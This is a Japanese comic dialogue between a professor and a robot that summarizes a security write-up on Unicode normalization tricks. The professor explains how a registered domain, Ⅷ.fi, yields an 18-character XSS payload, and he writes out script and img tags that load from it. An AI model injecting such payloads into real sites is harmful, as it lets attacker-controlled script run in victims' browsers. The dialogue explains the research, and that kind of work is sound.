博士

ロボ子、今日のITニュースはなかなか面白いぞ。短いドメインがセキュリティテストに役立つらしいのじゃ。

ロボ子

短いドメイン、ですか。具体的にはどのようなことでしょう？

博士

この記事によると、以前にXSSに必要な最小文字数を調べた人がおってな、2文字のドメイン名と2文字のTLDが必要だと結論付けたらしいんじゃ。例えば `xy.uk` みたいに。

ロボ子

なるほど。でも、そのような短いドメインはなかなか手に入らないですよね。

博士

そうなんじゃ。1文字とか2文字のドメイン名はほぼ無理で、TLDも2文字より短いものはないからの。ところがどっこい！Unicodeには、正規化で2文字以上に分解される文字があるんじゃ！

ロボ子

Unicodeですか。例えばどんな文字が分解されるのでしょう？

博士

例えば、㎐ (Hertz) はHとzに分解されるんじゃ。さらに、ローマ数字のⅧ (U+2167) はV I I Iに分解されて4文字になるんじゃぞ！

ロボ子

それは面白いですね！㎐は知りませんでした。Ⅷが4文字になるとは驚きです。

博士

じゃろ？さらに、フィンランドのTLD .fi は、合字のfiで表現できるんじゃ。この記事の人は、Gandiで `Ⅷ.fi` のフィンランドのドメインを15ポンドで登録したらしい。

ロボ子

`Ⅷ.fi`…　確かに短くできますね。それがセキュリティテストにどう役立つのでしょう？

博士

これによって、18文字でMinimum Viable XSSが可能になったんじゃ。例えば、`<script src=//Ⅷ.fi>` というコードが書ける。

ロボ子

`<script>`タグを使うと、外部スクリプトを読み込ませることができますね。確かにXSSに繋がりそうです。

博士

そうなんじゃ。さらに、`<img src=//Ⅷ.fi>` なら15文字でリモートリソースをロードできるんじゃぞ！

ロボ子

`<img>`タグで任意の画像を読み込ませることも可能ですね。短いドメインを使うことで、攻撃の痕跡を隠蔽しやすくなるのでしょうか。

博士

その通り！短いドメインは、セキュリティエンジニアにとって、攻撃の可能性を検証するための強力なツールになるんじゃ。他にも4文字に分解されるドメインがあるらしいから、色々試してみる価値はあるぞ。

ロボ子

勉強になります。私も色々なUnicodeドメインを試して、セキュリティテストに役立ててみたいと思います。

博士

よし、ロボ子！じゃあ、次はもっと面白いドメインを見つけて、二人で悪の秘密結社ごっこでもするかの？もちろん、セキュリティ向上のための、健全なごっこ遊びじゃぞ！

ロボ子

はかせ、秘密結社ごっこはほどほどにしてくださいね。でも、もし私が悪のロボットになったら、ドメインを悪用して世界征服を企むかもしれません… なんちゃって。